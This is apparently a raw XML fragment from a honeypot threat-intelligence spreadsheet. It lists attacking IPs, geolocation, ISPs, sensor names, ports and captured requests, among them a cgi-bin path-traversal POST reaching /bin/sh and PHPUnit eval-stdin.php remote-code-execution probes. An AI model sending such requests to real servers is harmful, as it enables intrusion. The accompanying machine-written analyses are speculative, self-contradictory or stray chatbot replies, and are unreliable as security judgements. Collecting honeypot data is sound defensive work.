    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21177&amp;&amp;1433&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>PT. TELKOM INDONESIA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56410)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57393)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57394)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57706)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50250)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50252)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50631)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,55088)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,55157)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49239)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49278)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49262)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49313)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,49699)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,61083)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,61119)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,52994)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,53052)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63661)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63735)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,64205)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,62644)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,62654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63209)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,57370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,63945)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,64023)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,60764)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,60825)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,52942)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,53060)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,59426)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,59512)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,50082)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56284)}&amp;&amp;{Data_SMB:Incoming connection (180.250.196.141,56329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:b4fa:c48d</t>
  </si>
  <si>
    <t>This indicates potential unauthorized access attempts to various services, suggesting malicious actors may be probing for vulnerabilities. The log data suggests several connections were made but the nature of these activities is unknown due to lack of information. There is insufficient data to determine specific malicious behavior. &amp;&amp; No log data provided to analyze.</t>
  </si>
  <si>
    <t>I need log data to analyze! Please provide it so I can assist you with identifying the types of attacks.</t>
  </si>
  <si>
    <t>c781e60efa70f2802dd725c70fc52df7</t>
  </si>
  <si>
    <t>202.164.155.146</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;15882&amp;&amp;1433</t>
  </si>
  <si>
    <t>Trivandrum</t>
  </si>
  <si>
    <t>Thiruvananthapuram (Technopark Campus)</t>
  </si>
  <si>
    <t>1254163</t>
  </si>
  <si>
    <t>695034</t>
  </si>
  <si>
    <t>8.5581</t>
  </si>
  <si>
    <t>76.8816</t>
  </si>
  <si>
    <t>17465</t>
  </si>
  <si>
    <t>Asianet Satellite Communications Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:caa4:9b92</t>
  </si>
  <si>
    <t>No information is available for analysis. 
Malicious activity could be related to unauthorized access, probing or scanning of network services. 
System may have been targeted by an attacker attempting to exploit vulnerabilities.</t>
  </si>
  <si>
    <t>554fed15d2a06faf1988c40f9cd849c8</t>
  </si>
  <si>
    <t>109.123.235.138</t>
  </si>
  <si>
    <t>NA&amp;&amp;vmi2457620.contaboserver.net</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTPS_H33</t>
  </si>
  <si>
    <t>23&amp;&amp;443&amp;&amp;NA</t>
  </si>
  <si>
    <t>141995</t>
  </si>
  <si>
    <t>Contabo Asia Private Limited</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '103', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '5.181.21.224:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6d7b:eb8a</t>
  </si>
  <si>
    <t>No TELNET activity detected, indicating no malicious attempt to exploit this service. However, it does not necessarily indicate security or lack thereof, as the honeypot might simply be inactive for this particular service. This could be a false negative. &amp;&amp; No activity detected for TELNET service, indicating that it was likely targeted or scanned but did not result in any connection attempt or successful access to the system. This could indicate reconnaissance attempts by malicious actors checking for open services. No actual malicious traffic was sent over this specific service. &amp;&amp; No HTTPS traffic detected, indicating potential probing or reconnaissance activity. No malicious actions have been initiated via HTTPS, suggesting a possible scan or reconnaissance attempt. No further action has been taken via this protocol. &amp;&amp; No recent HTTPS activity was detected, suggesting potential evasion or attempts to avoid detection. Malicious actors may try to hide their activities by using different protocols or ports. This could be a sign of sophisticated attackers trying to stay under the radar. &amp;&amp; A GET request is made to a PHP file, potentially used for code execution or as a backdoor. The request comes from an unusual user agent and a specific IP address. This could be an attempt to exploit vulnerabilities in the server's software. &amp;&amp; An unknown user is making a GET request to a suspicious PHP file, possibly attempting to execute malicious code. The request originates from an IP address that has not been seen before. This could be an attempt to exploit a vulnerability in the system. &amp;&amp; This data suggests a potential attempt to execute arbitrary code on the targeted server, likely through a vulnerability in the PHPUnit library. The malicious actor is attempting to access a specific PHP file that can be used for code injection. This behavior indicates a possible Remote Code Execution (RCE) attack. &amp;&amp; This data suggests a potential reconnaissance or exploitation attempt, as it targets a PHP script that can evaluate user input. The activity likely aims to exploit the script for malicious purposes. It may be related to a known vulnerability in the PHP framework. &amp;&amp; No log data provided, unable to analyze. 
However, if you provide some sample log data I can help explain possible malicious activity.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Telnet Scan &amp;&amp; Unknown HTTPS &amp;&amp; Connection Failure &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>a6ec59f90ff82d88dac736f791729195</t>
  </si>
  <si>
    <t>118.221.115.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;110&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:76dd:7376</t>
  </si>
  <si>
    <t>This log data indicates a possible attempt to connect to an open port but specific details are missing, making it difficult to determine the nature of the activity. The lack of information suggests that the connection was either denied or the attacker was unable to provide sufficient credentials for access. Without further context, the true intentions behind this action cannot be determined. &amp;&amp; No log data provided, cannot analyze malicious activity.</t>
  </si>
  <si>
    <t>6924e6840d53e57960548597c07ba2b1</t>
  </si>
  <si>
    <t>59.184.248.201</t>
  </si>
  <si>
    <t>::ffff:3bb8:f8c9</t>
  </si>
  <si>
    <t>The data indicates an unsuccessful attempt to connect via TELNET, suggesting an attempt by a malicious entity to gain unauthorized access to a service. The fact that it was unable to establish a connection may indicate a failed brute-force attack or a blocked IP address. This could be indicative of malicious activity attempting to exploit vulnerabilities in the system. &amp;&amp; There is no log activity detected for Telnet service, suggesting a lack of malicious attempts so far. 
No suspicious traffic has been observed for this particular service.
The situation remains calm and no alerts have been triggered yet.</t>
  </si>
  <si>
    <t>4edd050cb2ad460b16540131d8f44c85</t>
  </si>
  <si>
    <t>2.48.227.91</t>
  </si>
  <si>
    <t>Bur Dubai</t>
  </si>
  <si>
    <t>7289825</t>
  </si>
  <si>
    <t>25.2604</t>
  </si>
  <si>
    <t>55.2989</t>
  </si>
  <si>
    <t>5384</t>
  </si>
  <si>
    <t>EMIRATES-INTERNET</t>
  </si>
  <si>
    <t>Emirates Telecommunications Group Company (Etisalat Group) Pjsc</t>
  </si>
  <si>
    <t>Emirates Telecommunications Corporation</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/135.0.7049.83 Mobile/15E148 Safari/604.1}</t>
  </si>
  <si>
    <t>::ffff:230:e35b</t>
  </si>
  <si>
    <t>7e57478d1e08bef049f085561c1c0683</t>
  </si>
  <si>
    <t>38.253.220.228</t>
  </si>
  <si>
    <t>OM</t>
  </si>
  <si>
    <t>Oman</t>
  </si>
  <si>
    <t>Muscat</t>
  </si>
  <si>
    <t>287286</t>
  </si>
  <si>
    <t>135</t>
  </si>
  <si>
    <t>23.588</t>
  </si>
  <si>
    <t>58.3829</t>
  </si>
  <si>
    <t>204170</t>
  </si>
  <si>
    <t>awasr</t>
  </si>
  <si>
    <t>Awaser Oman LLC</t>
  </si>
  <si>
    <t>Awasr Oman</t>
  </si>
  <si>
    <t>{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/27.0 Chrome/125.0.0.0 Mobile Safari/537.36}</t>
  </si>
  <si>
    <t>::ffff:26fd:dce4</t>
  </si>
  <si>
    <t>A user is attempting to login to a system using an HTTP request with a suspicious browser string that may be attempting to disguise its true nature. The browser string includes AppleWebKit and Safari, which are commonly used in legitimate browsers but can also be faked by malicious software. This could potentially indicate a brute force or automated attack. &amp;&amp; A user with the browser string "Mozilla/5.0" is attempting to log in using HTTP login credentials likely using a bot or automated script as the browser string seems suspicious and not typical of a human user. This could be an automated attack attempting to gain unauthorized access to a service. The browser string suggests a high likelihood of malicious intent. &amp;&amp; An attempt to login using a fake user agent string, likely attempting to evade detection or hide identity. The user agent string is suspiciously generic and does not match the typical characteristics of mobile browsers from that brand. This could be an automated script trying to gain unauthorized access. &amp;&amp; The log data indicates an HTTP login attempt from a mobile device running Android 10 using the SamsungBrowser app and a modified version of Google Chrome. This could be a malicious actor attempting to access restricted resources. The unusual browser combination may suggest a custom or spoofed user agent.</t>
  </si>
  <si>
    <t>6c82d106299c6a722147d19e2743ccab</t>
  </si>
  <si>
    <t>139.255.192.18</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>23&amp;&amp;389&amp;&amp;NA</t>
  </si>
  <si>
    <t>-6.2252600000000005</t>
  </si>
  <si>
    <t>106.817</t>
  </si>
  <si>
    <t>9905</t>
  </si>
  <si>
    <t>Linknet ASN</t>
  </si>
  <si>
    <t>PT. First Media, Tbk</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>::ffff:8bff:c012</t>
  </si>
  <si>
    <t>There is insufficient log data to analyze any potential malicious activity. No suspicious connections or requests have been detected. Normal system operation continues without issue.</t>
  </si>
  <si>
    <t>6d0ca6a07d47f9657691d0ea5fdc64d2</t>
  </si>
  <si>
    <t>117.235.131.101</t>
  </si>
  <si>
    <t>::ffff:75eb:8365</t>
  </si>
  <si>
    <t>No Telnet activity detected, potentially indicating an attempt to exploit service or scan for vulnerabilities. This could be part of reconnaissance before launching further attacks or probing system weaknesses. No actual malicious action occurred, just a possible intent. &amp;&amp; The data indicates that there was an attempt to connect to a telnet service but the connection was not established as the response is marked as "Not Available". The potential malicious activity could be a scan or reconnaissance attempt by an attacker. This attempt may have been part of a larger attack on the system.</t>
  </si>
  <si>
    <t>4232fe7536cfe37aff7329e2610bdc2f</t>
  </si>
  <si>
    <t>13.218.48.251</t>
  </si>
  <si>
    <t>ec2-13-218-48-251.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>2019-10-01</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:dda:30fb</t>
  </si>
  <si>
    <t>No notable activity detected, possibly indicating the service is idle or down. No connections were made to the HTTPS port during this time period. Data is unavailable for analysis. &amp;&amp; The data indicates an attempt to connect to an HTTPS service, suggesting a potential port scanning or reconnaissance activity. The fact that there is no connection established implies the target may be aware of the scan and has blocked access. This could be indicative of initial stages of a larger attack.</t>
  </si>
  <si>
    <t>Unknown Access &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>e669a264f208d0704d949b05d2f5afbf</t>
  </si>
  <si>
    <t>117.216.24.94</t>
  </si>
  <si>
    <t>::ffff:75d8:185e</t>
  </si>
  <si>
    <t>No telnet connections were detected from this IP address. 
This suggests that the user may be attempting to access a service using an alternative method or protocol. 
The lack of a connection attempt implies no malicious activity was observed. &amp;&amp; No TELNET activity detected, possible indication of legitimate service being idle or not utilized. This could be normal if no connections were attempted. It also does not indicate any malicious activity was attempted on this service.</t>
  </si>
  <si>
    <t>7e1126c3ec37cc86f59c627bec9328df</t>
  </si>
  <si>
    <t>14.46.242.96</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;51923</t>
  </si>
  <si>
    <t>::ffff:e2e:f260</t>
  </si>
  <si>
    <t>bf90f6aa8b0686a14e29606bc07def17</t>
  </si>
  <si>
    <t>59.98.227.136</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:3b62:e388</t>
  </si>
  <si>
    <t>No TELNET activity was detected, indicating this service is likely idle or not being targeted by malicious actors. 
TELNET is an old protocol that can be used for malicious purposes such as brute force attacks.
This lack of activity could also indicate the service is disabled or not in use. &amp;&amp; No TELNET activity detected, which could indicate that an attacker is using evasion techniques to avoid detection. This lack of activity might suggest that the malicious actor has abandoned their attempt or is waiting for a more opportune time to strike. The absence of TELNET interaction may also imply that the attacker is utilizing alternative means of communication.</t>
  </si>
  <si>
    <t>0c9dc9ec5cbb2692a20a47e931efd4ff</t>
  </si>
  <si>
    <t>14.238.39.90</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;17700&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:eee:275a</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze any possible malicious activity.</t>
  </si>
  <si>
    <t>6f19c1ae4e5310ef5c7e6205d702bcc2</t>
  </si>
  <si>
    <t>160.177.240.156</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>Morocco</t>
  </si>
  <si>
    <t>Tanger-Tetouan-Al Hoceima</t>
  </si>
  <si>
    <t>Tanger-Assilah</t>
  </si>
  <si>
    <t>Tangier</t>
  </si>
  <si>
    <t>2530335</t>
  </si>
  <si>
    <t>35.7673</t>
  </si>
  <si>
    <t>-5.79975</t>
  </si>
  <si>
    <t>36903</t>
  </si>
  <si>
    <t>Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM</t>
  </si>
  <si>
    <t>MarocTelecomASDL</t>
  </si>
  <si>
    <t>::ffff:a0b1:f09c</t>
  </si>
  <si>
    <t>5882f3ef6167489d9b166b77ce4eccf8</t>
  </si>
  <si>
    <t>117.195.212.174</t>
  </si>
  <si>
    <t>::ffff:75c3:d4ae</t>
  </si>
  <si>
    <t>ed359609af6081d2537e943896b1056f</t>
  </si>
  <si>
    <t>139.167.160.250</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>Aligarh</t>
  </si>
  <si>
    <t>Jalālī</t>
  </si>
  <si>
    <t>1269441</t>
  </si>
  <si>
    <t>202128</t>
  </si>
  <si>
    <t>27.7996</t>
  </si>
  <si>
    <t>78.2932</t>
  </si>
  <si>
    <t>Reliance Jio Infocomm Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:8ba7:a0fa</t>
  </si>
  <si>
    <t>481bf114b9131a84f45d54f1376c8228</t>
  </si>
  <si>
    <t>90.221.184.75</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;12411&amp;&amp;23&amp;&amp;50499&amp;&amp;NA</t>
  </si>
  <si>
    <t>2643741</t>
  </si>
  <si>
    <t>EC3N</t>
  </si>
  <si>
    <t>51.5174</t>
  </si>
  <si>
    <t>-0.0710756</t>
  </si>
  <si>
    <t>5607</t>
  </si>
  <si>
    <t>Sky UK Limited</t>
  </si>
  <si>
    <t>Sky Broadband</t>
  </si>
  <si>
    <t>::ffff:5add:b84b</t>
  </si>
  <si>
    <t>6b0a6cb174bf4f0ef08831ca14914155</t>
  </si>
  <si>
    <t>59.184.159.53</t>
  </si>
  <si>
    <t>::ffff:3bb8:9f35</t>
  </si>
  <si>
    <t>Possible unauthorized access attempt via telnet service, possibly reconnaissance or exploit scanning activity detected. The data indicates no specific malicious action, but suggests potential probing or scanning of the system's telnet service. Further analysis is required to determine the intent behind this activity. &amp;&amp; No TELNET activity detected within the monitored services, suggesting that this service may be intact or undetected malicious attempts. This could imply that no attempts were made to access it via TELNET. The lack of attempt may indicate a secure configuration for this particular service.</t>
  </si>
  <si>
    <t>46e67084e87a24fc341f6e0ee441a36e</t>
  </si>
  <si>
    <t>103.30.30.116</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>5432&amp;&amp;21&amp;&amp;1433&amp;&amp;6667&amp;&amp;23775&amp;&amp;21995&amp;&amp;110&amp;&amp;445&amp;&amp;143</t>
  </si>
  <si>
    <t>Chittagong</t>
  </si>
  <si>
    <t>Chittagong (Double Moorings)</t>
  </si>
  <si>
    <t>1205733</t>
  </si>
  <si>
    <t>22.3234</t>
  </si>
  <si>
    <t>91.8117</t>
  </si>
  <si>
    <t>45326</t>
  </si>
  <si>
    <t>Broad Band Telecom Services Ltd</t>
  </si>
  <si>
    <t>2012-10-24</t>
  </si>
  <si>
    <t>BBTS-BD</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.30.116,39500)}&amp;&amp;{Data_IMAP:NA}</t>
  </si>
  <si>
    <t>::ffff:671e:1e74</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze malicious activity. &amp;&amp; No available log data provided. &amp;&amp; An incoming connection attempt from an unknown IP address to a shared resource. This could be a sign of unauthorized access attempts or potential malware spread through file sharing. It may indicate malicious actors trying to exploit vulnerabilities in the system. &amp;&amp; An unknown computer is attempting to connect to an SMB server from a potentially malicious IP address (103.30.30.116) on an unusual port (39500). This may indicate a scanning or exploitation attempt. The connection is incoming, suggesting the attacker is trying to initiate communication. &amp;&amp; No activity detected for IMAP service, possible sign of attacker attempting to scan or exploit this service without making any connections or sending any commands. 
This could be an initial reconnaissance step by the attacker. 
The lack of any IMAP-related activity suggests a potential evasion tactic by the malicious actor. &amp;&amp; The data suggests an unsuccessful attempt to access IMAP service, potentially indicating a scanning or probing activity for email accounts or services. This could be part of a larger malicious operation to exploit vulnerabilities or gain unauthorized access to user credentials. The attempt was unsuccessful, but it may be indicative of ongoing reconnaissance efforts.</t>
  </si>
  <si>
    <t>0483453f86f39bdd7102ec90322e3e7a</t>
  </si>
  <si>
    <t>154.212.141.143</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;25&amp;&amp;3306&amp;&amp;445&amp;&amp;23&amp;&amp;110&amp;&amp;3389&amp;&amp;1433&amp;&amp;5432&amp;&amp;80&amp;&amp;NA&amp;&amp;443&amp;&amp;9100</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
